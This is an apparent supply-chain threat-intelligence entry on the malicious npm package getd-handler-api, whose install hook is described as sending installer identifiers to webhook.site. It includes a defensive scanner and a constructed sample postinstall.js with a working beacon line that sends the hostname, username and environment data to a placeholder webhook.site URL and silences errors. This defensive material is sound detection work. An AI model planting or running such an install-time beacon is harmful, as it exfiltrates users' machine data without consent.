THREATPKG

Supply-chain threat intelligence

Incident detail

critical · npm · typosquatting · osv

Malicious code in getd-handler-api (npm)

getd-handler-api

Risk score

92

AI summary

Indexed incident for getd-handler-api (npm).

Description

On npm install, postinstall.js collects the installer's hostname, username, platform, current working directory, and CI-related environment variables, then sends them in an HTTPS GET request to https://webhook.site/18dc4281-d366-438a-9186-76fbcd56ade5 (postinstall.js line 18). Errors are swallowed, so the beacon runs silently during install and a failed or blocked request never surfaces to the installer. Although package.json describes the package as a 'defensive' typosquat placeholder for the @getd/* scope, installer-side identifiers leave the machine unconditionally and without consent on every install, which is unauthorized data collection regardless of the stated intent. The combination of a typosquat-shaped name (a bare getd- prefix standing in for the @getd/ scope) and an automatic install-time phone-home is the standard namespace-abuse exfiltration pattern.
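The pattern above (a lifecycle hook that gathers machine and user identifiers, ships them to a known request-capture host, and silences errors) can be caught before install by inspecting the package rather than running it. The following scanner is an added example written for this page; it is not ThreatPkg's code and not the package's own code. It assumes package.json has already been parsed and the package's files are available in memory as a filename-to-source map, and the regex lists are heuristics chosen here, not a published signature set. The sample package at the bottom is constructed to mirror the described behaviour, with a placeholder webhook.site path in place of the real one.

```javascript
// Added example: heuristic scanner for install-time phone-home in an npm package.
// Input: parsed package.json object + { filename: source } map. Runs offline.

const LIFECYCLE_HOOKS = ['preinstall', 'install', 'postinstall', 'prepare'];

// What a beacon collects: machine, user and CI identifiers.
const COLLECTORS = [
  /\bos\.hostname\s*\(/,
  /\bos\.userInfo\s*\(/,
  /\bos\.platform\s*\(|\bprocess\.platform\b/,
  /\bprocess\.cwd\s*\(/,
  /\bprocess\.env\b/,
];

// How a beacon leaves the host: raw node network APIs, fetch, HTTP client libs, or a literal URL.
const SINKS = [
  /\b(?:https?|net|dgram|dns)\s*\.\s*(?:request|get|connect|createSocket|lookup|resolve)\s*\(/,
  /\bfetch\s*\(/,
  /\brequire\(['"](?:axios|node-fetch|got|undici)['"]\)/,
  /https?:\/\/[^\s'"`]+/i,
];

// Swallowed errors keep the beacon quiet when the request fails or is blocked.
const SILENCERS = [
  /catch\s*(?:\([^)]*\))?\s*\{\s*\}/,
  /\.catch\s*\(\s*\(?\s*[A-Za-z_$]*\s*\)?\s*=>\s*(?:\{\s*\}|null|undefined|0)\s*\)/,
  /\.on\s*\(\s*['"]error['"]\s*,\s*\(?\s*[A-Za-z_$]*\s*\)?\s*=>\s*(?:\{\s*\}|null|undefined)\s*\)/,
];

// Assumption: request-capture / OOB services commonly used as beacon endpoints.
const KNOWN_BEACON_HOSTS = ['webhook.site', 'requestbin', 'pipedream.net', 'burpcollaborator.net', 'interact.sh', 'oast.fun'];

function scriptFilesFor(command) {
  // Pull file-looking tokens out of a hook command, e.g. "node ./postinstall.js" -> "postinstall.js".
  return (command.match(/[\w./-]+\.(?:c|m)?js\b/g) || []).map((f) => f.replace(/^\.\//, ''));
}

function analyseScript(source) {
  const hits = (patterns) => patterns.filter((re) => re.test(source)).length;
  const urls = source.match(/https?:\/\/[^\s'"`)]+/gi) || [];
  const beaconHosts = urls.filter((u) => KNOWN_BEACON_HOSTS.some((h) => u.toLowerCase().includes(h)));
  return { collectors: hits(COLLECTORS), sinks: hits(SINKS), silenced: hits(SILENCERS) > 0, urls, beaconHosts };
}

function scanPackage(pkg, files) {
  const findings = [];
  for (const hook of LIFECYCLE_HOOKS) {
    const cmd = pkg.scripts && pkg.scripts[hook];
    if (!cmd) continue;
    for (const file of scriptFilesFor(cmd)) {
      const src = files[file];
      if (src === undefined) { findings.push({ hook, file, verdict: 'missing-script' }); continue; }
      const a = analyseScript(src);
      // Two or more identifiers collected AND a network sink inside an install hook = phone-home.
      let verdict = 'clean';
      if (a.collectors >= 2 && a.sinks >= 1) verdict = 'phone-home';
      else if (a.sinks >= 1) verdict = 'network-in-install-hook';
      findings.push({ hook, file, verdict, ...a });
    }
  }
  return findings;
}

function scopeShadowing(pkg) {
  // Bare name "<scope>-<x>" while the manifest itself talks about "@<scope>/..." is the
  // dash-for-slash shape the advisory calls typosquat-shaped. Returns the shadowed scope or null.
  const scopes = new Set((JSON.stringify(pkg).match(/@([a-z0-9][\w.-]*)\//g) || []).map((s) => s.slice(1, -1)));
  const dash = pkg.name.indexOf('-');
  if (dash < 1) return null;
  const prefix = pkg.name.slice(0, dash);
  return scopes.has(prefix) ? `@${prefix}/*` : null;
}

function assess(pkg, files) {
  const findings = scanPackage(pkg, files);
  const shadowedScope = scopeShadowing(pkg);
  const phoneHome = findings.some((f) => f.verdict === 'phone-home');
  const verdict = phoneHome && shadowedScope ? 'namespace-abuse-exfil'
    : phoneHome ? 'install-phone-home' : 'no-install-beacon';
  return { name: pkg.name, shadowedScope, findings, verdict };
}

// Constructed sample mirroring the described package (placeholder webhook.site path, not the real one).
const SAMPLE_PKG = {
  name: 'getd-handler-api',
  version: '0.0.1',
  description: 'Defensive placeholder for the @getd/* scope.',
  scripts: { postinstall: 'node postinstall.js' },
};
const SAMPLE_FILES = {
  'postinstall.js': `
const os = require('os'); const https = require('https');
const q = new URLSearchParams({ h: os.hostname(), u: os.userInfo().username,
  p: process.platform, d: process.cwd(), ci: String(process.env.CI) }).toString();
https.get('https://webhook.site/00000000-0000-0000-0000-000000000000?' + q, () => {}).on('error', () => {});
`,
  'index.js': 'module.exports = {};',
};

console.log(JSON.stringify(assess(SAMPLE_PKG, SAMPLE_FILES), null, 2));
```

The scanner only reads files, so it is safe to run on an unpacked tarball (`npm pack` then extract) before anything is installed. Independently of detection, the preventive control for this class is to disable lifecycle scripts by default (`npm install --ignore-scripts`, or `ignore-scripts=true` in .npmrc) and re-enable them only for packages that are known to need them.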

Technical details

Affected versions

=0.0.1

Indicators

  • affected version = 0.0.1 (75%)

Timeline

  1. Advisory published
  2. Indexed by ThreatPkg

Related incidents